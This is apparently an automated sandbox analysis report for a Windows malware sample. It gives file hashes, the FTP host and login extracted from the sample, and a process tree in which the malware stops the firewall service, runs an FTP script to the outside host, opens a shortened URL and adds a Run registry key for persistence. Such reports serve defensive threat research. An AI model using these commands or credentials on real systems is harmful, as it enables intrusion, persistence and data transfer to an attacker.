Overview

overview

10

Static

static

e7febdc66f...f3.exe

windows7-x64

10

e7febdc66f...f3.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    174s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2022 12:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe

  • Size

    89KB

  • MD5

    c23796485337acadb13e02480bf06059

  • SHA1

    71fab61154104cc1fb80bf94be5310beef0de4c5

  • SHA256

    e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3

  • SHA512

    993c098e4da88034936135ccc55591d38b3eaaa97ed756d0811f32fba48d46c945312ac9ac1eb24f011bf13d6a73a34b7d2790c00586656d18d0171123bfbe44

  • SSDEEP

    1536:e5GJEhlcbW5sk1BlfLvveIbXWm+nwN6JKzs5gwCt4J6v43NzCl7/Hs3U3mRhshHK:EGu9BlfzWIbXWm+w0Jb5jJ6W1uMEztUP

Score
10/10
persistence

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    gupiao.laden.biz
  • Port:
    21
  • Username:
    user1961642
  • Password:
    mBZcfyJQ

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Drops file in System32 directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
    adwarespyware
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe
    "C:\Users\Admin\AppData\Local\Temp\e7febdc66f0e8106e398a1addd39292b21b3d4b6e3c8e041e1a2f7ae971805f3.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~5ABE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:2040
        • C:\Windows\SysWOW64\net.exe
          net stop sharedaccess
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1820
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop sharedaccess
            5⤵
              PID:1532
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://goo.gl/ewgWF
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:912
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:912 CREDAT:275457 /prefetch:2
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1620
          • C:\Windows\SysWOW64\ftp.exe
            ftp -s:ftp.txt
            4⤵
              PID:596
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c type "c:\windows\system32\vvtn.txt"
              4⤵
                PID:1212
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c type "c:\windows\system32\aabb.txt"
                4⤵
                  PID:1956
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v TINTSETP /t REG_SZ /d "C:\WINDOWS\system32\TINTSETP.exe" /f
                  4⤵
                  • Adds Run key to start application
                  PID:2012

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            Filesize

            340B

            MD5

            29293a10c7dc806503106b037795ba72

            SHA1

            ab9d49afb52a0df02a730e4cb8221f947b8ed46e

            SHA256

            a8cb68ec19bf5899f3e363ed41a4233f03f9f129bff13947607d262e431c1879

            SHA512

            28da3d70b108a48488ed33e6948e01a152bf3898d351bc308abfb50824db1d1defe32e27055be5c350751ed4d669c5b67f810802b42070b97affd91257fe2960

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\tcz8fqz\imagestore.dat
            Filesize

            5KB

            MD5

            7fb34e3665c93d59896e989e43696fe2

            SHA1

            026b65288ce78f1b63eca325d608fdd0565e1433

            SHA256

            bb2eee636d74ef588fc68a051c0b0fcd098313b54bc28be75b965f36973fd241

            SHA512

            3d12a7b108737b39b67250fb7861c86853d18608bf1996ba8462f0ce7c45215cf7edb651a1aeaabeaf579da31f344f77192a81e53d3f77a2ddb75b7e83361626

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\b.txt
            Filesize

            12B

            MD5

            4f806da7153d20c8ea56941ddabed0b7

            SHA1

            05d71958b8edd3969ea17d192dbdeb2661fcf7be

            SHA256

            a3e66dec8c136ef05b6cb5c936e9ca3cef7adc954cf35a0df7916a77bebb4775

            SHA512

            1930320d4976ace088101a8cddcd156b9297a42b4f5b27c908c49de0e7ac0203080e576ad23454c58571960a3e8e7aac0a0b1b5784b42cf7c04d1681808b1ce6

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ftp.txt
            Filesize

            318B

            MD5

            7b5186bb18dcda8af60689f10963044b

            SHA1

            cbfe9004d2f580da78171f3633c5262b15ec481b

            SHA256

            92ddd2439b76777fd556af30dd4a699ab517883cb0d12b48ac627735c3f8d44f

            SHA512

            1de723d1d1918c9295c4cdfd52ec75c2a52b7cc94d5b66c32ff22bcc864a23c85d9e3b7eca864e9f7c53a2fa1383f2188498425cbaa43969fe04910686a07881

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
            Filesize

            52KB

            MD5

            f47418fb97f4da4c117ecec13c17606e

            SHA1

            5bec90e612bc08ba99fd33f004aca1cd891c298d

            SHA256

            b61b31dccfda791f2e0bcdf00cf1ac41b86a7175e6ba8256c34d7e5ee0f34739

            SHA512

            13540d4e28212a9f2b080e5dfbf1b7d45b861a30053e139c08a0f977823a5824b1f3fe6a6fa2b2a291fb38a6460114010f361e53c7f4f9ef4b4af52be62645c8

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
            Filesize

            52KB

            MD5

            f47418fb97f4da4c117ecec13c17606e

            SHA1

            5bec90e612bc08ba99fd33f004aca1cd891c298d

            SHA256

            b61b31dccfda791f2e0bcdf00cf1ac41b86a7175e6ba8256c34d7e5ee0f34739

            SHA512

            13540d4e28212a9f2b080e5dfbf1b7d45b861a30053e139c08a0f977823a5824b1f3fe6a6fa2b2a291fb38a6460114010f361e53c7f4f9ef4b4af52be62645c8

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\~5ABE.bat
            Filesize

            4KB

            MD5

            bd95495789a0beed40addfd5dc83a26c

            SHA1

            5447c3d3d3fdc990ff61baff41886f05bd2b0ccb

            SHA256

            b881cbde09a0c99a5f68483cf2cb977802de6a1f379b7a24a6d85fa12717950e

            SHA512

            51b7b323984195546345447724dfd097d153e1b0fc4196f1d707515fb351657fb37d63accaf030ca9e868692994455738917c2fcd7a4191cb71e4959d21c76fd

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VER8EC8J.txt
            Filesize

            608B

            MD5

            0e039ea1ed9e739c22ef0df055631e08

            SHA1

            a6ceafa9e2ea0f5ad01c56af21b3e92957a4c113

            SHA256

            052e6e7d761c319f2c9290b3e570346c8e9af4a0144fa6deb5adccdb915cc31a

            SHA512

            20ae573a1c42ddc107fd909d3be8632626090f6f9ddf59bd7920c63ac1a3e6e6b0307ed46d0e18c9bd4310051c3f3ba5315a568c6ca90965e565d5e9884d959d

            Download Submit

          • \??\c:\windows\SysWOW64\aabb.txt
            Filesize

            96B

            MD5

            b6f6b78ae8d54d14524c1456ea060cd9

            SHA1

            b45bd523301af01c8458cdd04855afce45d3d9fb

            SHA256

            db9f2b1f4d454cbc3448da5d52b9e57aa7345d0becdb1ca83881cc36e8bc8bbe

            SHA512

            ddb2a2498232d3ad9b5ef09bb81975f6203ccedb3292058543d49e9724e041d60c864d968390f843e6f4a89b40a799667be809d764851b8f623da7608fce10d0

            Download Submit

          • \Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
            Filesize

            52KB

            MD5

            f47418fb97f4da4c117ecec13c17606e

            SHA1

            5bec90e612bc08ba99fd33f004aca1cd891c298d

            SHA256

            b61b31dccfda791f2e0bcdf00cf1ac41b86a7175e6ba8256c34d7e5ee0f34739

            SHA512

            13540d4e28212a9f2b080e5dfbf1b7d45b861a30053e139c08a0f977823a5824b1f3fe6a6fa2b2a291fb38a6460114010f361e53c7f4f9ef4b4af52be62645c8

            Download Submit

          • \Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
            Filesize

            52KB

            MD5

            f47418fb97f4da4c117ecec13c17606e

            SHA1

            5bec90e612bc08ba99fd33f004aca1cd891c298d

            SHA256

            b61b31dccfda791f2e0bcdf00cf1ac41b86a7175e6ba8256c34d7e5ee0f34739

            SHA512

            13540d4e28212a9f2b080e5dfbf1b7d45b861a30053e139c08a0f977823a5824b1f3fe6a6fa2b2a291fb38a6460114010f361e53c7f4f9ef4b4af52be62645c8

            Download Submit

          • \Users\Admin\AppData\Local\Temp\IXP000.TMP\vchott.exe
            Filesize

            52KB

            MD5

            f47418fb97f4da4c117ecec13c17606e

            SHA1

            5bec90e612bc08ba99fd33f004aca1cd891c298d

            SHA256

            b61b31dccfda791f2e0bcdf00cf1ac41b86a7175e6ba8256c34d7e5ee0f34739

            SHA512

            13540d4e28212a9f2b080e5dfbf1b7d45b861a30053e139c08a0f977823a5824b1f3fe6a6fa2b2a291fb38a6460114010f361e53c7f4f9ef4b4af52be62645c8

            Download Submit

          • memory/596-69-0x0000000000000000-mapping.dmp

            Download

          • memory/1212-72-0x0000000000000000-mapping.dmp

            Download

          • memory/1372-57-0x0000000000000000-mapping.dmp

            Download

          • memory/1532-67-0x0000000000000000-mapping.dmp

            Download

          • memory/1640-54-0x0000000075071000-0x0000000075073000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1820-65-0x0000000000000000-mapping.dmp

            Download

          • memory/1956-74-0x0000000000000000-mapping.dmp

            Download

          • memory/2012-77-0x0000000000000000-mapping.dmp

            Download

          • memory/2040-62-0x0000000000000000-mapping.dmp

            Download